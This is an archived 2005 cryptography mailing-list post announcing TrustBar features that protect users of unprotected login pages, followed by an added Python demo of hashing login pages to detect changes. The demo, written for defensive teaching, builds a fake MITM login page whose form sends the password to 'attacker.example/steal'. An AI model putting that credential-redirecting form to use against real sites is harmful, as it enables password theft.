[18510] in cryptography@c2.net mail archive
Defending users of unprotected login pages with TrustBar 0.4.9.93
daemon@ATHENA.MIT.EDU (Amir Herzberg)
Mon Sep 19 11:07:21 2005
X-Original-To: cryptography@metzdowd.com
Date: Mon, 19 Sep 2005 14:54:14 +0200
From: Amir Herzberg <herzbea@macs.biu.ac.il>
Reply-To: herzbea@macs.biu.ac.il
To: cryptography@metzdowd.com
Most financial and other sensitive web sites use SSL/TLS to authenticate
the server and protect data from eavesdropping and from modification by
a Man In The Middle (MITM) adversary.
However, quite a few of these sites invoke SSL/TLS only _after_ the user
has typed in her user name and pw, and clicked `submit`. This allows a
MITM adversary to send a modified login page to the user, which sends the
pw to the attacker (rather than encrypting it and sending it to the site).
See the link below to a `Hall of Shame (HoS)` listing such sites.
There are a few things we can do about this. We can try to convince these
sites to use SSL/TLS _before_ asking for userid and pw; I tried, and a few
fixed it, but most did not. We can avoid using these sites, but this is a
rather heavy penalty, e.g. if it is your bank. We can also try to find an
alternate login page which _is_ protected; in fact, we've found such
alternate, protected login pages for most ebanking sites (see HoS). But
this may be difficult for most (naive) users.
So, we decided to add support for users of these unprotected sites in
TrustBar. As of the latest version (0.4.9.93), available off my site
(below), we added two such mechanisms:
1. TrustBar will automatically download from our own server,
periodically, a list of all of the unprotected login sites, including
any alternate protected login pages we are aware of. By default,
whenever a user accesses one of these unprotected pages, she will be
automatically redirected to the alternate, protected login page.
2. TrustBar allows users to assign a name or a logo to sites, protected
or not (to help users identify fake sites). We have now added a mechanism
that computes a hash of every unprotected site for which the user has
assigned a name/logo. TrustBar compares this hash on subsequent accesses
to the same site. If the site is not modified in five subsequent
accesses, TrustBar begins displaying `Same since <date>`; and when the
site changes, TrustBar displays a warning. This can help users notice a
fake version of their login page. Unfortunately, this mechanism does not
work very well on most real-life login pages, since most of them contain
a tiny bit of frequently-changing data such as date or `random`
identifiers (mostly to identify a cookie-less client, we think). We are
working on improving the mechanism so it will be tolerant to such tiny
changes, without exposing the user to malicious changes.
Please try it and tell us what you think of TrustBar in general and
these features specifically. If you like it, please inform others, to
protect them, help convince browsers to incorporate such features, and -
last but not least for us - help us obtain more experimental data in our
research on secure usability. Thanks!
BTW, TrustBar is an open-source project, so if some of you want to
provide it to your customers, possibly customized (branded) etc., there
is no licensing required.
--
Best regards,
Amir Herzberg
Associate Professor
Department of Computer Science
Bar Ilan University
http://AmirHerzberg.com
Try TrustBar - improved browser security UI:
http://AmirHerzberg.com/TrustBar
Visit my Hall Of Shame of Unprotected Login pages:
http://AmirHerzberg.com/shame
---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com
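The change-detection mechanism (item 2 above) and its weakness on pages with per-visit noise can be made concrete. The following is an added example, not TrustBar's own code: it canonicalizes a login page before hashing, masking only the things the e-mail identifies as volatile (dates in text, hidden-field values such as session tokens), while keeping the form's `action` and the input names verbatim so that a MITM rewrite of where the password is posted still changes the hash. The five-visit threshold and the `Same since <date>` string follow the e-mail; the hostnames, the sample pages, the exact masking rules and the decision not to replace the stored baseline after a warning are assumptions made for this example.

```python
import hashlib
import re
from html.parser import HTMLParser

# Text patterns that routinely differ between visits of the same page
# (assumed rules for this example): ISO or "19 Sep 2005" style dates, and
# long hex strings used as cache-busters or tracking identifiers.
_DATE_RE = re.compile(r"\b\d{4}-\d{2}-\d{2}\b|\b\d{1,2}[/ .-]\w{2,9}[/ .-]\d{2,4}\b")
_TOKEN_RE = re.compile(r"\b[0-9a-fA-F]{16,}\b")

REQUIRED_STABLE_VISITS = 5  # "not modified in five subsequent accesses"


class _Canonicalizer(HTMLParser):
    """Emit a canonical token stream of the page: tags with sorted attributes,
    hidden-input values and date/token noise replaced by placeholders.
    Form actions, input names and script/src attributes are kept verbatim."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def handle_starttag(self, tag, attrs):
        attrs_d = {k: (v or "") for k, v in attrs}
        is_hidden = tag == "input" and attrs_d.get("type", "").lower() == "hidden"
        canon = []
        for name in sorted(attrs_d):
            value = attrs_d[name]
            if is_hidden and name == "value":
                value = "<HIDDEN-VALUE>"   # session/CSRF tokens change per visit
            else:
                value = _TOKEN_RE.sub("<TOKEN>", value)
            canon.append(f"{name}={value}")
        self.parts.append("<" + tag + " " + " ".join(canon) + ">")

    def handle_endtag(self, tag):
        self.parts.append("</" + tag + ">")

    def handle_data(self, data):
        text = " ".join(_DATE_RE.sub("<DATE>", data).split())
        if text:
            self.parts.append(text)


def canonical_hash(html):
    """SHA-256 over the canonical form, so per-visit noise does not change it."""
    parser = _Canonicalizer()
    parser.feed(html)
    parser.close()
    return hashlib.sha256("\n".join(parser.parts).encode("utf-8")).hexdigest()


class PageMonitor:
    """Tracks one baseline hash per URL, as TrustBar does for sites the user
    has named. The baseline is NOT replaced when a change is seen, so a
    tampered page keeps triggering the warning (an assumption of this example)."""

    def __init__(self):
        self._seen = {}  # url -> [baseline digest, first seen date, stable count]

    def observe(self, url, html, today):
        digest = canonical_hash(html)
        rec = self._seen.get(url)
        if rec is None:
            self._seen[url] = [digest, today, 1]
            return f"learning (1/{REQUIRED_STABLE_VISITS})"
        if rec[0] != digest:
            return f"WARNING: page changed since {rec[1]}"
        rec[2] += 1
        if rec[2] >= REQUIRED_STABLE_VISITS:
            return f"Same since {rec[1]}"
        return f"learning ({rec[2]}/{REQUIRED_STABLE_VISITS})"


def make_login_page(day, token, action="https://bank.example/login"):
    """Constructed sample login page (bank.example is not a real site). The
    footer date and the hidden session token are the per-visit noise the
    e-mail describes; everything else is identical across visits."""
    return f"""<html><body>
<form method="post" action="{action}">
  User: <input type="text" name="user">
  Password: <input type="password" name="pw">
  <input type="hidden" name="session" value="{token}">
  <input type="submit" value="Log in">
</form>
<p>Page generated on {day}</p>
</body></html>"""


def run_demo():
    """Five legitimate visits with changing noise, then a MITM copy whose form
    posts the password to the attacker. Returns the status shown each time."""
    monitor = PageMonitor()
    url = "http://bank.example/login"  # the unprotected (plain HTTP) login page
    days = ["2005-09-15", "2005-09-16", "2005-09-17", "2005-09-18", "2005-09-19"]
    tokens = [hashlib.sha256(d.encode()).hexdigest() for d in days]
    statuses = [monitor.observe(url, make_login_page(d, t), d) for d, t in zip(days, tokens)]
    mitm = make_login_page("2005-09-20", "deadbeef" * 4, action="http://attacker.example/steal")
    statuses.append(monitor.observe(url, mitm, "2005-09-20"))
    return statuses


if __name__ == "__main__":
    for status in run_demo():
        print(status)
```

The masking is deliberately narrow: whatever is masked is also invisible to the check, so a page that routes the password through a hidden field or an inline script consumed at submit time would need those parts kept verbatim. Widening the tolerance (for example, ignoring all attribute values) would make the `Same since` indicator appear sooner on noisy pages at the cost of hiding exactly the kind of change a MITM makes.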